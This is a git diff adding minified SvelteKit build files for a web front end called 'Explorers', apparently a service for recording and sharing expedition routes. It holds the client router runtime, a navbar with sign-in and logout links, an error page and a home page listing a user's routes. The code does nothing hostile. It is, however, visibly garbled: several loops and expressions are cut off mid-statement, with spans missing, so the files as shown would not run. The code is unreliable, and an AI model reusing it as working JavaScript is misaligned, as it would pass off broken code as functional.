P(M.href),M.origin===n.origin&&(N=M.href.slice(n.origin.length)),T?lt(N,M.href,O):ct(N,O)},setHeaders:()=>{},depends:P,parent(){return v.parent=!0,s()}};p=await b.universal.load.call(null,_)??null,p=p?await Rt(p):null}return{node:b,loader:e,server:c,universal:(L=b.universal)!=null&&L.load?{type:"data",data:p,uses:v}:null,data:p??(c==null?void 0:c.data)??null,slash:((A=b.universal)==null?void 0:A.trailingSlash)??(c==null?void 0:c.slash)}}function Oe(e,s,n,o,a){if(z)return!0;if(!o)return!1;if(o.parent&&e||o.route&&s||o.url&&n)return!0;for(const c of o.params)if(a[c]!==d.params[c])return!0;for(const c of o.dependencies)if(E.some(p=>p(new URL(c))))return!0;return!1}function de(e,s){return(e==null?void 0:e.type)==="data"?e:(e==null?void 0:e.type)==="skip"?s??null:null}async function pe({id:e,invalidating:s,url:n,params:o,route:a}){if((g==null?void 0:g.id)===e)return g.promise;const{errors:c,layouts:p,leaf:v}=a,b=[...p,v];c.forEach(S=>S==null?void 0:S().catch(()=>{})),b.forEach(S=>S==null?void 0:S[1]().catch(()=>{}));let y=null;const L=d.url?e!==d.url.pathname+d.url.search:!1,A=d.route?a.id!==d.route.id:!1;let P=!1;const _=b.map((S,I)=>{var B;const k=d.branch[I],$=!!(S!=null&&S[0])&&((k==null?void 0:k.loader)!==S[1]||Oe(P,A,L,(B=k.server)==null?void 0:B.uses,o));return $&&(P=!0),$});if(_.some(Boolean)){try{y=await He(n,_)}catch(S){return ie({status:S instanceof ne?S.status:500,error:await Q(S,{url:n,params:o,route:{id:a.id}}),url:n,route:a})}if(y.type==="redirect")return y}const w=y==null?void 0:y.nodes;let O=!1;const N=b.map(async(S,I)=>{var he;if(!S)return;const k=d.branch[I],$=w==null?void 0:w[I];if((!$||$.type==="skip")&&S[1]===(k==null?void 0:k.loader)&&!Oe(O,A,L,(he=k.universal)==null?void 0:he.uses,o))return k;if(O=!0,($==null?void 0:$.type)==="error")throw $;return ue({loader:S[1],url:n,params:o,route:a,parent:async()=>{var Te;const $e={};for(let ge=0;ge{});const M=[];for(let S=0;SPromise.resolve({}),server_data_node:de(c)}),b={node:await h(),loader:h,universal:null,server:null,data:null};return await X({url:n,params:a,branch:[v,b],status:e,error:s,route:null})}function Z(e,s){if(ye(e,G))return;const n=se(e);for(const o of f){const a=o.exec(n);if(a)return{id:e.pathname+e.search,invalidating:s,route:o,params:tt(a),url:e}}}function se(e){return et(e.pathname.slice(G.length)||"/")}function Ue({url:e,type:s,intent:n,delta:o}){let a=!1;const c=Be(d,n,e,s);o!==void 0&&(c.navigation.delta=o);const p={...c.navigation,cancel:()=>{a=!0,c.reject(new Error("navigation was cancelled"))}};return U||m.before_navigate.forEach(v=>v(p)),a?null:c}async function ce({url:e,scroll:s,keepfocus:n,redirect_count:o,details:a,type:c,delta:p,nav_token:v={},accepted:b,blocked:y}){var N,M,S;const L=Z(e,!1),A=Ue({url:e,type:c,delta:p,intent:L});if(!A){y();return}const P=x;b(),U=!0,T&&H.navigating.set(A.navigation),W=v;let _=L&&await pe(L);if(!_){if(ye(e,G))return await K(e);_=await je(e,{id:null},await Q(new Error(`Not found: ${e.pathname}`),{url:e,params:{},route:{id:null}}),404)}if(e=(L==null?void 0:L.url)||e,W!==v)return A.reject(new Error("navigation was aborted")),!1;if(_.type==="redirect")if(o>=20)_=await ie({status:500,error:await Q(new Error("Redirect loop"),{url:e,params:{},route:{id:null}}),url:e,route:{id:null}});else return re(new URL(_.location,e).href,{},o+1,v),!1;else((N=_.props.page)==null?void 0:N.status)>=400&&await H.updated.check()&&await K(e);if(E.length=0,z=!1,C=!0,be(P),Re(P),(M=_.props.page)!=null&&M.url&&_.props.page.url.pathname!==e.pathname&&(e.pathname=(S=_.props.page)==null?void 0:S.url.pathname),a){const I=a.replaceState?0:1;if(a.state[V]=x+=I,history[a.replaceState?"replaceState":"pushState"](a.state,"",e),!a.replaceState){let k=x+1;for(;ee[k]||J[k];)delete ee[k],delete J[k],k+=1}}if(g=null,T){d=_.state,_.props.page&&(_.props.page.url=e);const I=(await Promise.all(m.on_navigate.map(k=>k(A.navigation)))).filter(k=>typeof k=="function");if(I.length>0){let k=function(){m.after_navigate=m.after_navigate.filter($=>!I.includes($))};I.push(k),m.after_navigate.push(...I)}q.$set(_.props)}else Pe(_);const{activeElement:w}=document;if(await we(),R){const I=e.hash&&document.getElementById(decodeURIComponent(e.hash.slice(1)));s?scrollTo(s.x,s.y):I?I.scrollIntoView():scrollTo(0,0)}const O=document.activeElement!==w&&document.activeElement!==document.body;!n&&!O&&Ee(),R=!0,_.props.page&&(F=_.props.page),U=!1,c==="popstate"&&Ae(x),A.fulfil(void 0),m.after_navigate.forEach(I=>I(A.navigation)),H.navigating.set(null),C=!1}async function je(e,s,n,o){return e.origin===Me&&e.pathname===location.pathname&&!j?await ie({status:o,error:n,url:e,route:s}):await K(e)}function Xe(){let e;u.addEventListener("mousemove",c=>{const p=c.target;clearTimeout(e),e=setTimeout(()=>{o(p,2)},20)});function s(c){o(c.composedPath()[0],1)}u.addEventListener("mousedown",s),u.addEventListener("touchstart",s,{passive:!0});const n=new IntersectionObserver(c=>{for(const p of c)p.isIntersecting&&(oe(se(new URL(p.target.href))),n.unobserve(p.target))},{threshold:0});function o(c,p){const v=Ce(c,u);if(!v)return;const{url:b,external:y,download:L}=_e(v,G);if(y||L)return;const A=le(v);if(!A.reload)if(p<=A.preload_data){const P=Z(b,!1);P&&Le(P)}else p<=A.preload_code&&oe(se(b))}function a(){n.disconnect();for(const c of u.querySelectorAll("a")){const{url:p,external:v,download:b}=_e(c,G);if(v||b)continue;const y=le(c);y.reload||(y.preload_code===Ve.viewport&&n.observe(c),y.preload_code===Ve.eager&&oe(se(p)))}}m.after_navigate.push(a),a()}function Q(e,s){return e instanceof ne?e.body:t.hooks.handleError({error:e,event:s})??{message:s.route.id!=null?"Internal Error":"Not Found"}}return{after_navigate:e=>{me(()=>(m.after_navigate.push(e),()=>{const s=m.after_navigate.indexOf(e);m.after_navigate.splice(s,1)}))},before_navigate:e=>{me(()=>(m.before_navigate.push(e),()=>{const s=m.before_navigate.indexOf(e);m.before_navigate.splice(s,1)}))},on_navigate:e=>{me(()=>(m.on_navigate.push(e),()=>{const s=m.on_navigate.indexOf(e);m.on_navigate.splice(s,1)}))},disable_scroll_handling:()=>{(C||!T)&&(R=!1)},goto:(e,s={})=>re(e,s,0),invalidate:e=>{if(typeof e=="function")E.push(e);else{const{href:s}=new URL(e,location.href);E.push(n=>n.href===s)}return ke()},invalidate_all:()=>(z=!0,ke()),preload_data:async e=>{const s=new URL(e,De(document)),n=Z(s,!1);if(!n)throw new Error(`Attempted to preload a URL that does not belong to this app: ${s}`);await Le(n)},preload_code:oe,apply_action:async e=>{if(e.type==="error"){const s=new URL(location.href),{branch:n,route:o}=d;if(!o)return;const a=await xe(d.branch.length,n,o.errors);if(a){const c=await X({url:s,params:d.params,branch:n.slice(0,a.idx).concat(a.node),status:e.status??500,error:e.error,route:o});d=c.state,q.$set(c.props),we().then(Ee)}}else e.type==="redirect"?re(e.location,{invalidateAll:!0},0):(q.$set({form:null,page:{...F,form:e.data,status:e.status}}),await we(),q.$set({form:e.data}),e.type==="success"&&Ee())},_start_router:()=>{var s;history.scrollRestoration="manual",addEventListener("beforeunload",n=>{let o=!1;if(Ie(),!U){const a=Be(d,void 0,null,"leave"),c={...a.navigation,cancel:()=>{o=!0,a.reject(new Error("navigation was cancelled"))}};m.before_navigate.forEach(p=>p(c))}o?(n.preventDefault(),n.returnValue=""):history.scrollRestoration="auto"}),addEventListener("visibilitychange",()=>{document.visibilityState==="hidden"&&Ie()}),(s=navigator.connection)!=null&&s.saveData||Xe(),u.addEventListener("click",n=>{var P;if(n.button||n.which!==1||n.metaKey||n.ctrlKey||n.shiftKey||n.altKey||n.defaultPrevented)return;const o=Ce(n.composedPath()[0],u);if(!o)return;const{url:a,external:c,target:p,download:v}=_e(o,G);if(!a)return;if(p==="_parent"||p==="_top"){if(window.parent!==window)return}else if(p&&p!=="_self")return;const b=le(o);if(!(o instanceof SVGAElement)&&a.protocol!==location.protocol&&!(a.protocol==="https:"||a.protocol==="http:")||v)return;if(c||b.reload){Ue({url:a,type:"link"})?U=!0:n.preventDefault();return}const[L,A]=a.href.split("#");if(A!==void 0&&L===location.href.split("#")[0]){if(d.url.hash===a.hash){n.preventDefault(),(P=o.ownerDocument.getElementById(A))==null||P.scrollIntoView();return}if(D=!0,be(x),e(a),!b.replace_state)return;D=!1,n.preventDefault()}ce({url:a,scroll:b.noscroll?te():null,keepfocus:b.keep_focus??!1,redirect_count:0,details:{state:{},replaceState:b.replace_state??a.href===location.href},accepted:()=>n.preventDefault(),blocked:()=>n.preventDefault(),type:"link"})}),u.addEventListener("submit",n=>{if(n.defaultPrevented)return;const o=HTMLFormElement.prototype.cloneNode.call(n.target),a=n.submitter;if(((a==null?void 0:a.formMethod)||o.method)!=="get")return;const p=new URL((a==null?void 0:a.hasAttribute("formaction"))&&(a==null?void 0:a.formAction)||o.action);if(ye(p,G))return;const v=n.target,{keep_focus:b,noscroll:y,reload:L,replace_state:A}=le(v);if(L)return;n.preventDefault(),n.stopPropagation();const P=new FormData(v),_=a==null?void 0:a.getAttribute("name");_&&P.append(_,(a==null?void 0:a.getAttribute("value"))??""),p.search=new URLSearchParams(P).toString(),ce({url:p,scroll:y?te():null,keepfocus:b??!1,redirect_count:0,details:{state:{},replaceState:A??p.href===location.href},nav_token:{},accepted:()=>{},blocked:()=>{},type:"form"})}),addEventListener("popstate",async n=>{var o;if(W={},(o=n.state)!=null&&o[V]){if(n.state[V]===x)return;const a=J[n.state[V]],c=new URL(location.href);if(d.url.href.split("#")[0]===location.href.split("#")[0]){e(c),J[x]=te(),x=n.state[V],scrollTo(a.x,a.y);return}const p=n.state[V]-x;await ce({url:c,scroll:a,keepfocus:!1,redirect_count:0,details:null,accepted:()=>{x=n.state[V]},blocked:()=>{history.go(-p)},type:"popstate",delta:p,nav_token:W})}else if(!D){const a=new URL(location.href);e(a)}}),addEventListener("hashchange",()=>{D&&(D=!1,history.replaceState({...history.state,[V]:++x},"",location.href))});for(const n of document.querySelectorAll("link"))n.rel==="icon"&&(n.href=n.href);addEventListener("pageshow",n=>{n.persisted&&H.navigating.set(null)});function e(n){d.url=n,H.page.set({...F,url:n}),H.page.notify()}},_hydrate:async({status:e=200,error:s,node_ids:n,params:o,route:a,data:c,form:p})=>{j=!0;const v=new URL(location.href);({params:o={},route:a={id:null}}=Z(v,!1)||{});let b;try{const y=n.map(async(P,_)=>{const w=c[_];return w!=null&&w.uses&&(w.uses=Ye(w.uses)),ue({loader:t.nodes[P],url:v,params:o,route:a,parent:async()=>{const O={};for(let N=0;N<_;N+=1)Object.assign(O,(await y[N]).data);return O},server_data_node:de(w)})}),L=await Promise.all(y),A=f.find(({id:P})=>P===a.id);if(A){const P=A.layouts;for(let _=0;_u?"1":"0").join(""));const i=await Ke(f.href);if((h=i.headers.get("content-type"))!=null&&h.includes("text/html")&&await K(t),!i.ok)throw new ne(i.status,await i.json());return new Promise(async u=>{var j;const E=new Map,l=i.body.getReader(),g=new TextDecoder;function m(T){return Et(T,{Promise:R=>new Promise((C,U)=>{E.set(R,{fulfil:C,reject:U})})})}let d="";for(;;){const{done:T,value:R}=await l.read();if(T&&!d)break;for(d+=!R&&d?`
+`:g.decode(R);;){const C=d.indexOf(`
+`);if(C===-1)break;const U=JSON.parse(d.slice(0,C));if(d=d.slice(C+1),U.type==="redirect")return u(U);if(U.type==="data")(j=U.nodes)==null||j.forEach(D=>{(D==null?void 0:D.type)==="data"&&(D.uses=Ye(D.uses),D.data=m(D.data))}),u(U);else if(U.type==="chunk"){const{id:D,data:z,error:q}=U,x=E.get(D);E.delete(D),q?x.reject(m(q)):x.fulfil(m(z))}}}})}function Ye(t){return{dependencies:new Set((t==null?void 0:t.dependencies)??[]),params:new Set((t==null?void 0:t.params)??[]),parent:!!(t!=null&&t.parent),route:!!(t!=null&&t.route),url:!!(t!=null&&t.url)}}function Ee(){const t=document.querySelector("[autofocus]");if(t)t.focus();else{const r=document.body,f=r.getAttribute("tabindex");r.tabIndex=-1,r.focus({preventScroll:!0,focusVisible:!1}),f!==null?r.setAttribute("tabindex",f):r.removeAttribute("tabindex");const i=getSelection();if(i&&i.type!=="None"){const h=[];for(let u=0;u{if(i.rangeCount===h.length){for(let u=0;u{h=d,u=j});return E.catch(()=>{}),{navigation:{from:{params:t.params,route:{id:((g=t.route)==null?void 0:g.id)??null},url:t.url},to:f&&{params:(r==null?void 0:r.params)??null,route:{id:((m=r==null?void 0:r.route)==null?void 0:m.id)??null},url:f},willUnload:!r,type:i,complete:E},fulfil:h,reject:u}}async function xt(t,r,f){const i=Lt(t,r);Ze({client:i}),f?await i._hydrate(f):i.goto(location.href,{replaceState:!0}),i._start_router()}export{xt as start};
diff --git a/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js b/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js
new file mode 100644
index 0000000..e6a8de2
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js
@@ -0,0 +1 @@
+import{P as V}from"../chunks/public.550f299c.js";import{s as j,r as D,f as v,a as S,g as h,h as g,u as L,c as w,d as f,j as r,i as m,v as y,w as H,x as U,y as z}from"../chunks/scheduler.1f572272.js";import{S as P,i as B,a as N,t as O}from"../chunks/index.b942bf85.js";const R=!1;async function $({fetch:o}){const t=await o(`${V}/user`,{credentials:"include"});let s=null;try{t.ok&&(s=await t.json())}catch{s=null}return{user:s}}const Y=Object.freeze(Object.defineProperty({__proto__:null,load:$,ssr:R},Symbol.toStringTag,{value:"Module"}));const q=""+new URL("../assets/marker.884e7495.png",import.meta.url).href;function F(o){let t,s="Sign in",n,l,u="Sign Up ";return{c(){t=v("a"),t.textContent=s,n=S(),l=v("a"),l.innerHTML=u,this.h()},l(a){t=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-5zsfxw"&&(t.textContent=s),n=w(a),l=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(l)!=="svelte-zar3ip"&&(l.innerHTML=u),this.h()},h(){r(t,"class","button is-light"),r(t,"href","/signin"),r(t,"role","button"),r(l,"class","button is-primary"),r(l,"href","/signup"),r(l,"role","button")},m(a,_){m(a,t,_),m(a,n,_),m(a,l,_)},d(a){a&&(f(t),f(n),f(l))}}}function G(o){let t,s="Logout";return{c(){t=v("a"),t.textContent=s,this.h()},l(n){t=h(n,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-7wlhk2"&&(t.textContent=s),this.h()},h(){r(t,"class","button is-primary"),r(t,"href","/logout"),r(t,"role","button")},m(n,l){m(n,t,l)},d(n){n&&f(t)}}}function J(o){let t,s,n=` Explorers
`,l,u,a,_,k,b,p;function x(e,c){return e[0].user?G:F}let C=x(o),d=C(o);const E=o[2].default,i=D(E,o,o[1],null);return{c(){t=v("nav"),s=v("div"),s.innerHTML=n,l=S(),u=v("div"),a=v("div"),_=v("div"),d.c(),k=S(),b=v("main"),i&&i.c(),this.h()},l(e){t=h(e,"NAV",{class:!0,role:!0,"aria-label":!0});var c=g(t);s=h(c,"DIV",{class:!0,"data-svelte-h":!0}),L(s)!=="svelte-81k4k6"&&(s.innerHTML=n),l=w(c),u=h(c,"DIV",{class:!0});var A=g(u);a=h(A,"DIV",{class:!0});var I=g(a);_=h(I,"DIV",{class:!0});var M=g(_);d.l(M),M.forEach(f),I.forEach(f),A.forEach(f),c.forEach(f),k=w(e),b=h(e,"MAIN",{});var T=g(b);i&&i.l(T),T.forEach(f),this.h()},h(){r(s,"class","navbar-brand"),r(_,"class","buttons"),r(a,"class","navbar-item"),r(u,"class","navbar-end"),r(t,"class","navbar is-link"),r(t,"role","navigation"),r(t,"aria-label","main navigation")},m(e,c){m(e,t,c),y(t,s),y(t,l),y(t,u),y(u,a),y(a,_),d.m(_,null),m(e,k,c),m(e,b,c),i&&i.m(b,null),p=!0},p(e,[c]){C!==(C=x(e))&&(d.d(1),d=C(e),d&&(d.c(),d.m(_,null))),i&&i.p&&(!p||c&2)&&H(i,E,e,e[1],p?z(E,e[1],c,null):U(e[1]),null)},i(e){p||(N(i,e),p=!0)},o(e){O(i,e),p=!1},d(e){e&&(f(t),f(k),f(b)),d.d(),i&&i.d(e)}}}function K(o,t,s){let{$$slots:n={},$$scope:l}=t,{data:u}=t;return o.$$set=a=>{"data"in a&&s(0,u=a.data),"$$scope"in a&&s(1,l=a.$$scope)},[u,l,n]}class Z extends P{constructor(t){super(),B(this,t,K,J,j,{data:0})}}export{Z as component,Y as universal};
diff --git a/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js b/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js
new file mode 100644
index 0000000..5c87d41
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/0.901c8284.js
@@ -0,0 +1 @@
+import{P as V}from"../chunks/public.aa8ed6af.js";import{s as j,r as D,f as v,a as S,g as h,h as g,u as L,c as w,d as f,j as r,i as m,v as y,w as H,x as U,y as z}from"../chunks/scheduler.1f572272.js";import{S as P,i as B,a as N,t as O}from"../chunks/index.b942bf85.js";const R=!1;async function $({fetch:o}){const t=await o(`${V}/user`,{credentials:"include"});let s=null;try{t.ok&&(s=await t.json())}catch{s=null}return{user:s}}const Y=Object.freeze(Object.defineProperty({__proto__:null,load:$,ssr:R},Symbol.toStringTag,{value:"Module"}));const q=""+new URL("../assets/marker.884e7495.png",import.meta.url).href;function F(o){let t,s="Sign in",n,l,u="Sign Up ";return{c(){t=v("a"),t.textContent=s,n=S(),l=v("a"),l.innerHTML=u,this.h()},l(a){t=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-5zsfxw"&&(t.textContent=s),n=w(a),l=h(a,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(l)!=="svelte-zar3ip"&&(l.innerHTML=u),this.h()},h(){r(t,"class","button is-light"),r(t,"href","/signin"),r(t,"role","button"),r(l,"class","button is-primary"),r(l,"href","/signup"),r(l,"role","button")},m(a,_){m(a,t,_),m(a,n,_),m(a,l,_)},d(a){a&&(f(t),f(n),f(l))}}}function G(o){let t,s="Logout";return{c(){t=v("a"),t.textContent=s,this.h()},l(n){t=h(n,"A",{class:!0,href:!0,role:!0,"data-svelte-h":!0}),L(t)!=="svelte-7wlhk2"&&(t.textContent=s),this.h()},h(){r(t,"class","button is-primary"),r(t,"href","/logout"),r(t,"role","button")},m(n,l){m(n,t,l)},d(n){n&&f(t)}}}function J(o){let t,s,n=` Explorers
`,l,u,a,_,k,b,p;function x(e,c){return e[0].user?G:F}let C=x(o),d=C(o);const E=o[2].default,i=D(E,o,o[1],null);return{c(){t=v("nav"),s=v("div"),s.innerHTML=n,l=S(),u=v("div"),a=v("div"),_=v("div"),d.c(),k=S(),b=v("main"),i&&i.c(),this.h()},l(e){t=h(e,"NAV",{class:!0,role:!0,"aria-label":!0});var c=g(t);s=h(c,"DIV",{class:!0,"data-svelte-h":!0}),L(s)!=="svelte-81k4k6"&&(s.innerHTML=n),l=w(c),u=h(c,"DIV",{class:!0});var A=g(u);a=h(A,"DIV",{class:!0});var I=g(a);_=h(I,"DIV",{class:!0});var M=g(_);d.l(M),M.forEach(f),I.forEach(f),A.forEach(f),c.forEach(f),k=w(e),b=h(e,"MAIN",{});var T=g(b);i&&i.l(T),T.forEach(f),this.h()},h(){r(s,"class","navbar-brand"),r(_,"class","buttons"),r(a,"class","navbar-item"),r(u,"class","navbar-end"),r(t,"class","navbar is-link"),r(t,"role","navigation"),r(t,"aria-label","main navigation")},m(e,c){m(e,t,c),y(t,s),y(t,l),y(t,u),y(u,a),y(a,_),d.m(_,null),m(e,k,c),m(e,b,c),i&&i.m(b,null),p=!0},p(e,[c]){C!==(C=x(e))&&(d.d(1),d=C(e),d&&(d.c(),d.m(_,null))),i&&i.p&&(!p||c&2)&&H(i,E,e,e[1],p?z(E,e[1],c,null):U(e[1]),null)},i(e){p||(N(i,e),p=!0)},o(e){O(i,e),p=!1},d(e){e&&(f(t),f(k),f(b)),d.d(),i&&i.d(e)}}}function K(o,t,s){let{$$slots:n={},$$scope:l}=t,{data:u}=t;return o.$$set=a=>{"data"in a&&s(0,u=a.data),"$$scope"in a&&s(1,l=a.$$scope)},[u,l,n]}class Z extends P{constructor(t){super(),B(this,t,K,J,j,{data:0})}}export{Z as component,Y as universal};
diff --git a/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js b/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js
new file mode 100644
index 0000000..ccf8102
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js
@@ -0,0 +1 @@
+import{s as S,f as _,l as d,a as x,g as f,h as g,m as h,d as l,c as q,i as m,v,n as $,z as E,A as y}from"../chunks/scheduler.1f572272.js";import{S as z,i as A}from"../chunks/index.b942bf85.js";import{d as C}from"../chunks/singletons.1951defa.js";const H=()=>{const s=C;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},P={subscribe(s){return H().page.subscribe(s)}};function j(s){var b;let t,r=s[0].status+"",o,n,i,c=((b=s[0].error)==null?void 0:b.message)+"",u;return{c(){t=_("h1"),o=d(r),n=x(),i=_("p"),u=d(c)},l(e){t=f(e,"H1",{});var a=g(t);o=h(a,r),a.forEach(l),n=q(e),i=f(e,"P",{});var p=g(i);u=h(p,c),p.forEach(l)},m(e,a){m(e,t,a),v(t,o),m(e,n,a),m(e,i,a),v(i,u)},p(e,[a]){var p;a&1&&r!==(r=e[0].status+"")&&$(o,r),a&1&&c!==(c=((p=e[0].error)==null?void 0:p.message)+"")&&$(u,c)},i:E,o:E,d(e){e&&(l(t),l(n),l(i))}}}function k(s,t,r){let o;return y(s,P,n=>r(0,o=n)),[o]}let F=class extends z{constructor(t){super(),A(this,t,k,j,S,{})}};export{F as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js b/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js
new file mode 100644
index 0000000..6df545e
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js
@@ -0,0 +1 @@
+import{s as S,f as _,l as d,a as x,g as f,h as g,m as h,d as l,c as q,i as m,v,n as $,z as E,A as y}from"../chunks/scheduler.1f572272.js";import{S as z,i as A}from"../chunks/index.b942bf85.js";import{d as C}from"../chunks/singletons.27fcd387.js";const H=()=>{const s=C;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},P={subscribe(s){return H().page.subscribe(s)}};function j(s){var b;let t,r=s[0].status+"",o,n,i,c=((b=s[0].error)==null?void 0:b.message)+"",u;return{c(){t=_("h1"),o=d(r),n=x(),i=_("p"),u=d(c)},l(e){t=f(e,"H1",{});var a=g(t);o=h(a,r),a.forEach(l),n=q(e),i=f(e,"P",{});var p=g(i);u=h(p,c),p.forEach(l)},m(e,a){m(e,t,a),v(t,o),m(e,n,a),m(e,i,a),v(i,u)},p(e,[a]){var p;a&1&&r!==(r=e[0].status+"")&&$(o,r),a&1&&c!==(c=((p=e[0].error)==null?void 0:p.message)+"")&&$(u,c)},i:E,o:E,d(e){e&&(l(t),l(n),l(i))}}}function k(s,t,r){let o;return y(s,P,n=>r(0,o=n)),[o]}let F=class extends z{constructor(t){super(),A(this,t,k,j,S,{})}};export{F as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js b/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js
new file mode 100644
index 0000000..251cdca
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js
@@ -0,0 +1 @@
+import{s as P,f as m,a as E,g as p,h as k,c as I,u as L,d as u,j as g,B,i as y,v as _,z as C,C as W,o as G,l as S,m as $,n as F,e as U,k as J}from"../chunks/scheduler.1f572272.js";import{S as V,i as z,a as j,t as q,b as K,d as Q,m as X,e as Y}from"../chunks/index.b942bf85.js";import{P as Z}from"../chunks/public.aa8ed6af.js";import{e as ee}from"../chunks/edit.a04a5399.js";function H(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}async function te({fetch:n,parent:e}){return await e(),{}}const ge=Object.freeze(Object.defineProperty({__proto__:null,load:te},Symbol.toStringTag,{value:"Module"})),N=""+new URL("../assets/world.bab3a2dd.png",import.meta.url).href;function D(n,e,s){const t=n.slice();return t[1]=e[s],t}function O(n){let e,s,t=n[1].title+"",l,c;return{c(){e=m("p"),s=m("a"),l=S(t),this.h()},l(i){e=p(i,"P",{});var r=k(e);s=p(r,"A",{href:!0});var v=k(s);l=$(v,t),v.forEach(u),r.forEach(u),this.h()},h(){g(s,"href",c="/route/"+n[1].id)},m(i,r){y(i,e,r),_(e,s),_(s,l)},p(i,r){r&1&&t!==(t=i[1].title+"")&&F(l,t),r&1&&c!==(c="/route/"+i[1].id)&&g(s,"href",c)},d(i){i&&u(e)}}}function se(n){let e,s,t,l,c,i="Routes created by you:",r,v,f=H(n[0]),a=[];for(let h=0;h{const c=await(await fetch(`${Z}/route`,{credentials:"include"})).json();s(0,t=c)}),n.$$set=l=>{"routes"in l&&s(0,t=l.routes)},[t]}class ie extends V{constructor(e){super(),z(this,e,le,se,P,{routes:0})}}const ne=""+new URL("../assets/file-upload.156694fe.png",import.meta.url).href,ae=""+new URL("../assets/share.f4c802a8.png",import.meta.url).href;function ce(n){let e,s;return{c(){e=m("p"),s=S(n[1]),this.h()},l(t){e=p(t,"P",{style:!0});var l=k(e);s=$(l,n[1]),l.forEach(u),this.h()},h(){J(e,"color","red")},m(t,l){y(t,e,l),_(e,s)},p:C,d(t){t&&u(e)}}}function re(n){let e,s='Welcome to the "Explorers" service!';return{c(){e=m("h3"),e.textContent=s,this.h()},l(t){e=p(t,"H3",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1fzjqit"&&(e.textContent=s),this.h()},h(){g(e,"class","title is-3")},m(t,l){y(t,e,l)},p:C,d(t){t&&u(e)}}}function oe(n){let e,s,t=n[0].username+"",l,c;return{c(){e=m("h2"),s=S("Welcome back, "),l=S(t),c=S("!"),this.h()},l(i){e=p(i,"H2",{class:!0});var r=k(e);s=$(r,"Welcome back, "),l=$(r,t),c=$(r,"!"),r.forEach(u),this.h()},h(){g(e,"class","title is-3")},m(i,r){y(i,e,r),_(e,s),_(e,l),_(e,c)},p:C,d(i){i&&u(e)}}}function de(n){let e,s=`Record your expedition route using smart trackers.
Record
Upload your route to the service!
Upload
Or create the route manually
Create
Share your route with colleagues and management.
Share
`,t,l,c=' ';return{c(){e=m("section"),e.innerHTML=s,t=E(),l=m("section"),l.innerHTML=c,this.h()},l(i){e=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(e)!=="svelte-1xgemfr"&&(e.innerHTML=s),t=I(i),l=p(i,"SECTION",{class:!0,"data-svelte-h":!0}),L(l)!=="svelte-1u36zsb"&&(l.innerHTML=c),this.h()},h(){g(e,"class","section"),g(l,"class","section")},m(i,r){y(i,e,r),y(i,t,r),y(i,l,r)},i:C,o:C,d(i){i&&(u(e),u(t),u(l))}}}function ue(n){let e,s,t,l,c,i,r='',v;return l=new ie({}),{c(){e=m("section"),s=m("div"),t=m("div"),K(l.$$.fragment),c=E(),i=m("div"),i.innerHTML=r,this.h()},l(f){e=p(f,"SECTION",{class:!0});var a=k(e);s=p(a,"DIV",{class:!0});var h=k(s);t=p(h,"DIV",{class:!0});var b=k(t);Q(l.$$.fragment,b),b.forEach(u),h.forEach(u),c=I(a),i=p(a,"DIV",{class:!0,"data-svelte-h":!0}),L(i)!=="svelte-1fi6orn"&&(i.innerHTML=r),a.forEach(u),this.h()},h(){g(t,"class","column is-half has-text-centered"),g(s,"class","columns is-centered"),g(i,"class","columns is-centered"),g(e,"class","section")},m(f,a){y(f,e,a),_(e,s),_(s,t),X(l,t,null),_(e,c),_(e,i),v=!0},i(f){v||(j(l.$$.fragment,f),v=!0)},o(f){q(l.$$.fragment,f),v=!1},d(f){f&&u(e),Y(l)}}}function he(n){let e,s,t,l,c,i,r,v,f,a=n[1]&&ce(n);function h(d,x){return d[0]?oe:re}let o=h(n)(n);const w=[ue,de],T=[];function A(d,x){return d[0]?0:1}return i=A(n),r=T[i]=w[i](n),{c(){a&&a.c(),e=E(),s=m("section"),t=m("div"),l=m("div"),o.c(),c=E(),r.c(),v=U(),this.h()},l(d){a&&a.l(d),e=I(d),s=p(d,"SECTION",{class:!0});var x=k(s);t=p(x,"DIV",{class:!0});var M=k(t);l=p(M,"DIV",{class:!0});var R=k(l);o.l(R),R.forEach(u),M.forEach(u),x.forEach(u),c=I(d),r.l(d),v=U(),this.h()},h(){g(l,"class","column is-half has-text-centered"),g(t,"class","columns is-centered"),g(s,"class","section")},m(d,x){a&&a.m(d,x),y(d,e,x),y(d,s,x),_(s,t),_(t,l),o.m(l,null),y(d,c,x),T[i].m(d,x),y(d,v,x),f=!0},p(d,[x]){d[1]&&a.p(d,x),o.p(d,x)},i(d){f||(j(r),f=!0)},o(d){q(r),f=!1},d(d){d&&(u(e),u(s),u(c),u(v)),a&&a.d(d),o.d(),T[i].d(d)}}}function fe(n,e,s){let{data:t}=e,l=t.user,c;return n.$$set=i=>{"data"in i&&s(2,t=i.data)},[l,c,t]}class be extends V{constructor(e){super(),z(this,e,fe,he,P,{data:2})}}export{be as component,ge as universal};
